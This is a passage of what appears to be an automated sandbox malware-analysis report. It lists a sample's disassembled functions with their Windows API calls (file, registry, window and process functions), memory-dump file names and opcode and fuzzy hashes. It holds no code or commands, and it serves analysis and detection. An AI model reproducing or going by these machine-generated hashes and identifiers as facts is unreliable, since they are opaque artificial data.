Instruction Fuzzy Hash: D451D062F0564686FB04ABA1D8452FDA322AF9DB88F802236DA4D5B7D6DF2CD401C360

Function 00007FF70E7AA834 Relevance: 4.6, APIs: 3, Instructions: 133registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FF70E7AA877
RegCloseKey.ADVAPI32 ref: 00007FF70E7AA9B9

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: CloseOpen
String ID:
API String ID: 47109696-0
Opcode ID: 3d7106c7d5ccef62372c9b37b0d8b2bcd6c4040773d7db820f5012b29da06867
Instruction ID: 88d11834addd09f9d1980eac1f41f5ac588cf41f652c6d915779f9fa7775cf93
Opcode Fuzzy Hash: 3d7106c7d5ccef62372c9b37b0d8b2bcd6c4040773d7db820f5012b29da06867
Instruction Fuzzy Hash: 0B51BE22B14A0685EF20EF65D8442AD63B1FF8CBC8B886536DE5D53B98DF38D080C350

Function 00007FF70E792134 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00007FF70E7921CF
CreateFileW.KERNEL32 ref: 00007FF70E79223C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7922D8

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: CreateFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2272807158-0
Opcode ID: 650906bb36444c59f78769edd7e70a31dc34f49dc41decdeb4024168be9b1e6b
Instruction ID: fc4c8613481179c66b1376904425e183921dca3e5cdd80032eceb209b9c39686
Opcode Fuzzy Hash: 650906bb36444c59f78769edd7e70a31dc34f49dc41decdeb4024168be9b1e6b
Instruction Fuzzy Hash: B341A77261878192EB14AB25F844269A3A1FF887B4F506335DFAD07AE5CF3CE4948710

Function 00007FF70E7823F8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32 ref: 00007FF70E78243E
GetWindowTextW.USER32 ref: 00007FF70E782476
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E782505

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2176759853-0
Opcode ID: 1bf85210b9a87779fb11811f9a7e2f8ba75c636e64e4f9da94f36f1c7ff0fb34
Instruction ID: 8386e4a21697060e7cc27b45363736f936f14241efebb4146f1bc2a46998bdab
Opcode Fuzzy Hash: 1bf85210b9a87779fb11811f9a7e2f8ba75c636e64e4f9da94f36f1c7ff0fb34
Instruction Fuzzy Hash: CA21A272A19B8181EA14AB65E94017AB364FF9DBD0F946236EBDD03BA5DF3CD181C700

Function 00007FF70E7A1F94 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF70E7A205B
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF70E7A2077
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF70E7A2093

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: std::bad_alloc::bad_alloc
String ID:
API String ID: 1875163511-0
Opcode ID: ed06525d720d284fc54222632f53f2fcbb29030dbea5caf8b24800418b5d5b0f
Instruction ID: 58e3a4b967fe2bec544cc5dbae485c469c6a0ec888b6c40237edcde6ee2acedb
Opcode Fuzzy Hash: ed06525d720d284fc54222632f53f2fcbb29030dbea5caf8b24800418b5d5b0f
Instruction Fuzzy Hash: 12319252A0D68651FB24B714F8443BAE3A0FF98784FD85031D28C069AADF7CE946C311

Function 00007FF70E793D34 Relevance: 4.6, APIs: 3, Instructions: 62COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,00000000,00000001,?,00007FF70E7A07E1), ref: 00007FF70E793D5E
SetFileAttributesW.KERNEL32 ref: 00007FF70E793DB0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E793E1A

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1203560049-0
Opcode ID: 30421b436104fcb90b4cd2208b99a3bf3782908f0837f7a91d3eb4cb73bf7196
Instruction ID: c8ba6be025de1d7e1538d5dcc91985d5006f3a392ef4d8ffebe1abbac07dad8d
Opcode Fuzzy Hash: 30421b436104fcb90b4cd2208b99a3bf3782908f0837f7a91d3eb4cb73bf7196
Instruction Fuzzy Hash: EE21C822A1868181FA20AF35FC5526AA361FF8CB94F906235EA9D47699DF3CD580C610

Function 00007FF70E7931BC Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000000,00007FF70E7A0822), ref: 00007FF70E7931E7
DeleteFileW.KERNEL32 ref: 00007FF70E793237
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7932A1

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3118131910-0
Opcode ID: 539e2a0488ada646b9a4eb5c90a9f278ffd13936dc8dbc7caf4118334a65d282
Instruction ID: 01940714dd4ca82cb69594ee43cf1cf4dc25f06977888beb9cb9739c2d8a91e5
Opcode Fuzzy Hash: 539e2a0488ada646b9a4eb5c90a9f278ffd13936dc8dbc7caf4118334a65d282
Instruction Fuzzy Hash: 81218822A18B8181FA10AB25F84526EA360FF8DB94F902335EADE466A5DF3CE540C610

Function 00007FF70E7932BC Relevance: 4.6, APIs: 3, Instructions: 57COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,00007FF70E79E5B1,?,?,?,00000000,?), ref: 00007FF70E7932E7
GetFileAttributesW.KERNELBASE ref: 00007FF70E793334
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E793399

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1203560049-0
Opcode ID: a8bcf6e2598255fa991570dfaf367ef52c8767d47326b3423635884fafe6ecbe
Instruction ID: 3986770bdc844912c66567b6d7f1523e6c91e655d6264780cc8843cb475a2eeb
Opcode Fuzzy Hash: a8bcf6e2598255fa991570dfaf367ef52c8767d47326b3423635884fafe6ecbe
Instruction Fuzzy Hash: 19218632A1878181EA10AB29F844229A361FFCDBA4F902331EADD47BE5DF3CD580C710

Function 00007FF70E7BBF64 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF70E7BBF48), ref: 00007FF70E7BBF8C
TerminateProcess.KERNEL32(?,?,?,00007FF70E7BBF48), ref: 00007FF70E7BBF97
ExitProcess.KERNEL32 ref: 00007FF70E7BBFA6

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
Instruction ID: 977ed9c726cb9d9b944a972f788eaa32a68581248c5f32f6e76448dc02624fee
Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
Instruction Fuzzy Hash: E3E01A24B043054AFA587B31DC95379A3566F9CB51F50643CDC8E02396CF3DE4898621

Function 00007FF70E78F578 Relevance: 3.2, APIs: 2, Instructions: 193COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78F895
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E78F89B

Part of subcall function 00007FF70E793EC8: FindClose.KERNEL32(?,?,00000000,00007FF70E7A0811), ref: 00007FF70E793EFD

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseFind
String ID:
API String ID: 3587649625-0
Opcode ID: 9a071fa467f85a34a6f05ca9243d790f6abafaa5b1570881c384a2819231f8c8
Instruction ID: 88836e5acadc1df971fd8b7d0fb238a00d5eda5c52b9097de5961f667a569525
Opcode Fuzzy Hash: 9a071fa467f85a34a6f05ca9243d790f6abafaa5b1570881c384a2819231f8c8
Instruction Fuzzy Hash: 1391C232B5878594FB14EF24D9442ADA361FF98798FC06132EA4C07AE9DF78D545C310

Function 00007FF70E783904 Relevance: 3.1, APIs: 2, Instructions: 124COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E783AB3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E783AB9

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 08c6e2d20e94fe5d114b94b17f84e93e5249d169b81ce8341d273cd43f7755ea
Instruction ID: 923d649cd0bf1c37738be9edca6570929ea386a686020e7cac6e9997cdd38a18
Opcode Fuzzy Hash: 08c6e2d20e94fe5d114b94b17f84e93e5249d169b81ce8341d273cd43f7755ea
Instruction Fuzzy Hash: 3F41D322F5465294FB00EBB5D9403EDA320AF58BD8F942235EE5D27ADADF38D482C310

Function 00007FF70E792778 Relevance: 3.1, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF70E79274D), ref: 00007FF70E7928A9
GetLastError.KERNEL32(?,00007FF70E79274D), ref: 00007FF70E7928B8

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
Instruction ID: ccfdbcea93f27f52e200a5deba1409aa91a9f3aece22bd969232aaf451845bc4
Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
Instruction Fuzzy Hash: 8D31FA22B1999291FA607B76ED40AB4A394AF0CBD4F942131DE1D077B1DF3CE4818360

Function 00007FF70E7822BC Relevance: 3.1, APIs: 2, Instructions: 83COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00007FF70E7822F1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7823F0

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: Item_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1746051919-0
Opcode ID: 95739ad7301a08b82252912ada3ab6f57aee1bff7a48893d1edd4817af44debc
Instruction ID: 0f40d791edc09c8a8a229efc1ec2f080e4ae99ee5154a7964b85672a0dd9f208
Opcode Fuzzy Hash: 95739ad7301a08b82252912ada3ab6f57aee1bff7a48893d1edd4817af44debc
Instruction Fuzzy Hash: A731E432A1978182EA14AB15F95436EF360EFA8790F806235EB9C07BE6DF3CE440C710

Function 00007FF70E792AD0 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32 ref: 00007FF70E792AFE
SetFileTime.KERNELBASE ref: 00007FF70E792B9B

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
Instruction ID: bc4627b32d7140ee0cbef33c2a4cb70cfb572046c68cfefbd724f3d6f293c944
Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
Instruction Fuzzy Hash: DF21B522F0DB82A1EA65BE21FC047B697E5AF09794F956031DE4C062A6FF3CD486C210

Function 00007FF70E79AAE0 Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 00007FF70E79AB67
LoadStringW.USER32 ref: 00007FF70E79AB80

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
Instruction ID: 8c4ca7988b5176db7e2eb9c9f57dccd281dabfbd0337082082729a3ae45200e7
Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
Instruction Fuzzy Hash: 0E115B71B09A5186EA00EF1AEC44169F7A1BF8CFD4F945439CA1DA3720EF7CE5418354

Function 00007FF70E792BB0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE ref: 00007FF70E792C11
GetLastError.KERNEL32 ref: 00007FF70E792C1E

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
Instruction ID: 540f0d2466c02d3686948c53d5b1efedca2ed3c52fec4df162f91286a039767d
Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
Instruction Fuzzy Hash: 7F116021A0C68291EB60AB25FC40279A260FF59BB4F946331EA7D562E5DF3CE582C710

Function 00007FF70E78255C Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF70E79A4AC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF70E79A504
Part of subcall function 00007FF70E79A4AC: SetDlgItemTextW.USER32 ref: 00007FF70E79A573
Part of subcall function 00007FF70E79A4AC: GetWindowRect.USER32 ref: 00007FF70E79A5AD
Part of subcall function 00007FF70E79A4AC: GetClientRect.USER32 ref: 00007FF70E79A5BB

GetDlgItem.USER32 ref: 00007FF70E7825AC
SetWindowTextW.USER32 ref: 00007FF70E7825C8

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: ItemRectTextWindow$Clientswprintf
String ID:
API String ID: 3322643685-0
Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
Instruction ID: 90c6ea09ee88172895dc373403d6556752e0d371b6131fcebceadaa8f1ca096f
Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
Instruction Fuzzy Hash: FE019220A8968A41FE497B51ED58279E3919F5D745F882076C81D063EAEF2CE884D320

Function 00007FF70E79EB58 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,00007FF70E79EBAD,?,?,?,?,00007FF70E795752,?,?,?,00007FF70E7956DE), ref: 00007FF70E79EB5C
GetProcessAffinityMask.KERNEL32 ref: 00007FF70E79EB6F

Memory Dump Source

Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true

Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
Instruction ID: bc6b9be9298473fc8dc561fed9aa10d88bf44ed2c30bc532fbd62f4552802d50
Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
Instruction Fuzzy Hash: FEE0E561B1458646DB089B65C8409A9A3D2FF8CB40FC4903AD60B83614DF2CE1858B00

